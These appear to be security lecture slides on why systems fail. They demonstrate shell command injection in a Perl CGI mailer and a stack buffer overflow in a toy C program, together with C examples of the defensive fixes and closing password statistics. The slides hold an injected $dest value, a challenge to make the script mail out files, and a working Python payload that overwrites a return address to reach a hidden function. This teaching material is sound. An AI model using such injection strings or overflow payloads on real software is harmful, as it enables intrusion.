Why Security Systems Fail


Capability List

Access Control List

State diagram: ALL STATES; UNSAFE / UNDEFINED STATES; SAFE STATES


#!/usr/bin/perl
# funky CGI script example
$dest = "foo1"; # pretend this is the destination address from the user
open (MAIL,"| /bin/cat >$dest "); # pretend this was a call to sendmail
print MAIL "To: $dest\nFrom: me\n\nHi there!\n";
close MAIL;

Same script, now with a $dest value a user could have supplied:

#!/usr/bin/perl
# funky CGI script example
$dest = "foo1; echo 'this could be bad!';find . -name '*.c' -print;";
open (MAIL,"| /bin/cat >$dest "); # pretend this was a call to sendmail
print MAIL "To: $dest\nFrom: me\n\nHi there!\n";
close MAIL;


#!/usr/bin/perl -w
# (1) quit unless we have the correct number of command-line args
$num_args = $#ARGV + 1;
if ($num_args != 2) {
    print "\nUsage: name.pl email-address brief-message\n";
    exit;
}
# (2) we got two command line args, so assume it's address
$dest=$ARGV[0];
$content=$ARGV[1];
my $sendmail = "/usr/sbin/sendmail -t";
#open (MAIL,"| /bin/cat >$dest "); # pretend this was a call to sendmail
open (MAIL,"|$sendmail") or die "Cannot open sendmail: $!";
print MAIL "To: $dest\n";
print MAIL "From: me\n";
print MAIL "Subject: test\n";
print MAIL "Content-type: text/plain\n\n";
print MAIL $content;
close MAIL;

Run it with

./tryit.pl ccpalmer "Some long message here inside quotes"

Could you find a way to trick the perl script into mailing you some file that it shouldn't???
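Both CGI scripts above hand $dest to a shell, and tryit.pl writes $dest and $content into the mail stream without looking at them. The following is an added example, not part of the slides: a C version of the same mailer (the slides use Perl) that checks the recipient against a short allow-list before using it anywhere, and starts the mailer with execv() so no shell ever parses the recipient. /bin/cat stands in for /usr/sbin/sendmail so the program runs on any machine; the MAILER define, the allowed character set and the function names are this example's own choices.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Stand-in for /usr/sbin/sendmail so the example runs without a mailer
 * installed (assumption of this example). */
#define MAILER "/bin/cat"

/* Accept only characters that can appear in a simple mailbox address.
 * Shell metacharacters, spaces, CR and LF are all rejected, so the value
 * can neither alter a command line nor add lines after "To: ". */
int valid_recipient(const char *dest)
{
    static const char allowed[] =
        "abcdefghijklmnopqrstuvwxyz"
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "0123456789.@_+-";
    size_t len = strlen(dest);

    if (len == 0 || len > 254)
        return 0;
    return strspn(dest, allowed) == len;
}

/* Run prog with argv directly (execv, no /bin/sh) and feed body to its
 * standard input through a pipe. Returns the child's exit status, or -1. */
int run_with_stdin(const char *prog, char *const argv[], const char *body)
{
    int fds[2];
    int status;
    pid_t pid;
    const char *p = body;
    size_t left = strlen(body);

    if (pipe(fds) != 0)
        return -1;
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {                     /* child: stdin <- pipe, then exec */
        dup2(fds[0], STDIN_FILENO);
        close(fds[0]);
        close(fds[1]);
        execv(prog, argv);
        _exit(127);                     /* only reached if execv failed */
    }
    close(fds[0]);                      /* parent writes the message */
    while (left > 0) {
        ssize_t w = write(fds[1], p, left);
        if (w < 0)
            break;
        p += w;
        left -= (size_t)w;
    }
    close(fds[1]);
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Same message layout as tryit.pl. Returns the mailer's exit status, or -1
 * if the recipient is refused or the message does not fit. */
int send_message(const char *dest, const char *content)
{
    char body[1024];
    char *const argv[] = { MAILER, NULL };
    int n;

    if (!valid_recipient(dest))
        return -1;
    n = snprintf(body, sizeof body,
                 "To: %s\nFrom: me\nSubject: test\nContent-type: text/plain\n\n%s\n",
                 dest, content);
    if (n < 0 || (size_t)n >= sizeof body)
        return -1;
    return run_with_stdin(MAILER, argv, body);
}

int main(int argc, char **argv)
{
    if (argc != 3) {
        fprintf(stderr, "Usage: %s email-address brief-message\n", argv[0]);
        return 2;
    }
    return send_message(argv[1], argv[2]) == 0 ? 0 : 1;
}
```

The allow-list is deliberately narrow; widening it to every address RFC 5322 permits is a separate decision, and the point here is that the check runs before the value reaches either a command line or a header.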



“Never fly in a plane designed by an optimist.”


name[9] and degree[4] are adjacent in memory; both start out as zeros:

name[9]:    0   0   0   0   0   0   0   0   0
degree[4]:  0   0   0   0

strcpy(name,"charles");
strcpy(degree,"PhD");

name[9]:   'c' 'h' 'a' 'r' 'l' 'e' 's'  0   0
degree[4]: 'P' 'h' 'D'  0

printf(name);    -> charles
printf(degree);  -> PhD


name[9] and degree[4], again adjacent and initially zero:

strcpy(name,"charleton");

name[9]:   'c' 'h' 'a' 'r' 'l' 'e' 't' 'o' 'n'
degree[4]:  0   0   0   0        (the terminating 0 of "charleton" lands in degree[0])

strcpy(degree,"PhD");

name[9]:   'c' 'h' 'a' 'r' 'l' 'e' 't' 'o' 'n'
degree[4]: 'P' 'h' 'D'  0        (name no longer has a terminator of its own)

printf(name);    -> charletonPhD
printf(degree);  -> PhD
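The two layouts above show strcpy() running past the end of name[9] into degree[4], and then degree's copy removing name's terminator. As an added example (not from the slides), here is the same pair of adjacent arrays filled with a bounded copy that always terminates and reports when it had to cut the input; struct person, copy_bounded and fill_person are names chosen for this example.

```c
#include <stdio.h>
#include <string.h>

/* The same two adjacent arrays as on the slide: name holds at most 8
 * characters plus the terminating NUL, degree at most 3 plus NUL. */
struct person {
    char name[9];
    char degree[4];
};

/* Bounded copy that always leaves dst NUL-terminated, however long src is.
 * Returns 1 if src fit, 0 if it was cut to dstsize-1 characters. */
int copy_bounded(char *dst, size_t dstsize, const char *src)
{
    size_t n = strlen(src);

    if (dstsize == 0)
        return 0;
    if (n >= dstsize) {
        memcpy(dst, src, dstsize - 1);
        dst[dstsize - 1] = '\0';
        return 0;
    }
    memcpy(dst, src, n + 1);            /* includes the NUL */
    return 1;
}

/* Fill both fields. Returns how many of the two values fit without
 * truncation, so a caller can reject a record that was cut short. */
int fill_person(struct person *p, const char *name, const char *degree)
{
    int fitted = 0;

    fitted += copy_bounded(p->name, sizeof p->name, name);
    fitted += copy_bounded(p->degree, sizeof p->degree, degree);
    return fitted;
}

/* Print with an explicit "%s": printf(name) as written on the slide would
 * let any '%' inside the data act as a conversion directive. */
void print_person(const struct person *p)
{
    printf("%s\n%s\n", p->name, p->degree);
}

int main(void)
{
    struct person p;

    if (fill_person(&p, "charleton", "PhD") != 2)
        fputs("warning: a field was truncated\n", stderr);
    print_person(&p);                   /* charleto and PhD, not charletonPhD */
    return 0;
}
```

Whether to truncate or reject is a policy question; what must not happen is the silent write past the end, and the return value is what lets the caller enforce the policy.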


#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void secret1(void) {
    puts("You found the secret function No. 1!\n");
}

int main () {
    char string[2];
    puts("Input: ");
    scanf("%s", string);
    printf("You entered %s.\n", string);
    return 0;
}


At startup of poof

0x0000000100000e52 <main+0>:  push %rbp            /* entry to main() */
0x0000000100000e53 <main+1>:  mov %rsp,%rbp
0x0000000100000e56 <main+4>:  sub $0x10,%rsp
0x0000000100000e5a <main+8>:  lea 0x75(%rip),%rdi
0x0000000100000e61 <main+15>: callq 0x100000ea4    /* puts () */
0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi
0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi
0x0000000100000e71 <main+31>: mov $0x0,%eax
0x0000000100000e76 <main+36>: callq 0x100000eaa    /* scanf () */
0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi
0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi
0x0000000100000e86 <main+52>: mov $0x0,%eax
0x0000000100000e8b <main+57>: callq 0x100000e9e    /* printf () */
0x0000000100000e90 <main+62>: mov $0x0,%eax
0x0000000100000e95 <main+67>: leaveq
0x0000000100000e96 <main+68>: retq

rip 0x000100000e52
rbp 0x7fff5fbff828
rsp 0x7fff5fbff818

0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff810: 0x20 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00
0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00


Before call to puts()
(same main() disassembly as above)

rip 0x000100000e61
rbp 0x7fff5fbff810
rsp 0x7fff5fbff800

0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00
0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00


Just inside of puts() (one instruction in)
(same main() disassembly as above)

rip 0x000100000ea4
rbp 0x7fff5fbff810
rsp 0x7fff5fbff7f8

0x7fff5fbff7f8: 0x66 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00
0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00


Just after return from puts()
(same main() disassembly as above)

rip 0x000100000e66
rbp 0x7fff5fbff810
rsp 0x7fff5fbff800

0x7fff5fbff7f8: 0x66 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00
0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00


Just inside scanf( ) (one instruction in)
(same main() disassembly as above)

rip 0x000100000e66
rsi 0x7fff5fbff800
rbp 0x7fff5fbff810
rsp 0x7fff5fbff7f8

0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00
0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00


After return from scanf ( )
(same main() disassembly as above)

rip 0x000100000e7b
rbp 0x7fff5fbff810
rsp 0x7fff5fbff800

0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00


Just before stack cleanup
(same main() disassembly as above)

rip 0x000100000e95
rbp 0x7fff5fbff810
rsp 0x7fff5fbff800

0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00


And ready to return to the operating system?
(same main() disassembly as above)

rip 0x000100000e96
rbp 0x414141414141
rsp 0x7fff5fbff818

0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00


Hello secret1( ) !!!

0x0000000100000e40 <secret1+0>:  push %rbp
0x0000000100000e41 <secret1+1>:  mov %rsp,%rbp
0x0000000100000e44 <secret1+4>:  lea 0x65(%rip),%rdi    # 0x100000eb0
0x0000000100000e4b <secret1+11>: callq 0x100000ea4 <dyld_stub_puts>
0x0000000100000e50 <secret1+16>: leaveq
0x0000000100000e51 <secret1+17>: retq

rip 0x000100000e40
rbp 0x414141414141
rsp 0x7fff5fbff818

0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00


$ poof
Input:
A
You entered A.
$ cat poop
import struct
rip = 0x0000000100000e40
print("A"*24 + struct.pack("<q", rip))
$ python poop | poof
Input:
You entered AAAAAAAAAAAAAAAAAAAAAAAA@^N.
You found the secret function No. 1!
Segmentation fault
$
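poof reads into string[2] with scanf("%s"), which has no way of knowing where the buffer ends; that is what lets 24 'A's and a packed address reach the saved rbp and return address in the dumps above. Added example, not from the slides: a bounded token reader used in place of scanf("%s"), in a main() of the same shape. read_token_bounded and read_token_from_string (which feeds a constructed input string through a temporary file) are this example's own names.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Bounded replacement for scanf("%s", buf): reads one whitespace-delimited
 * token into buf, storing at most bufsize-1 characters plus the NUL.
 * Surplus characters are consumed and discarded and *truncated is set, so
 * the caller can refuse the input rather than silently keep a prefix.
 * Returns the number of characters stored, or -1 on EOF before any token. */
int read_token_bounded(FILE *in, char *buf, size_t bufsize, int *truncated)
{
    size_t n = 0;
    int c;

    *truncated = 0;
    if (bufsize == 0)
        return -1;
    while ((c = fgetc(in)) != EOF && isspace(c))   /* skip leading blanks */
        ;
    if (c == EOF) {
        buf[0] = '\0';
        return -1;
    }
    do {
        if (n + 1 < bufsize)
            buf[n++] = (char)c;
        else
            *truncated = 1;                         /* drop, never write past end */
    } while ((c = fgetc(in)) != EOF && !isspace(c));
    buf[n] = '\0';
    return (int)n;
}

/* Run the reader over a constructed input string instead of the terminal,
 * using a temporary file (standard C) as the FILE source. */
int read_token_from_string(const char *input, char *buf, size_t bufsize,
                           int *truncated)
{
    FILE *f = tmpfile();
    int rc;

    if (f == NULL)
        return -1;
    fputs(input, f);
    rewind(f);
    rc = read_token_bounded(f, buf, bufsize, truncated);
    fclose(f);
    return rc;
}

/* Same shape as poof's main(), with the bounded reader in place of
 * scanf("%s"). Over-long input now leaves string[] holding "A" and the
 * saved rbp and return address exactly as the prologue left them. */
int main(void)
{
    char string[2];
    int truncated;

    puts("Input: ");
    if (read_token_bounded(stdin, string, sizeof string, &truncated) < 0)
        return 1;
    if (truncated) {
        fputs("Input too long, rejected.\n", stderr);
        return 1;
    }
    printf("You entered %s.\n", string);
    return 0;
}
```

A width in the format (scanf("%1s", string) for a two-byte buffer) is the one-line fix; the reader above adds the truncation report so the program can reject rather than quietly shorten. Building with a stack protector (gcc's -fstack-protector) is the matching defence-in-depth: it does not stop the overwrite, but it aborts the process before the corrupted return address is used.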


And speaking of passwords …

  • 4.7% of users have the password password;

  • 8.5% have the passwords password or 123456;

  • 9.8% have the passwords password, 123456 or 12345678;

  • 14% have a password from the top 10 passwords

  • 40% have a password from the top 100 passwords

  • 79% have a password from the top 500 passwords

  • 91% have a password from the top 1000 passwords

From https://xato.net/passwords/more-top-worst-passwords/#.VAh-1Esc8pw

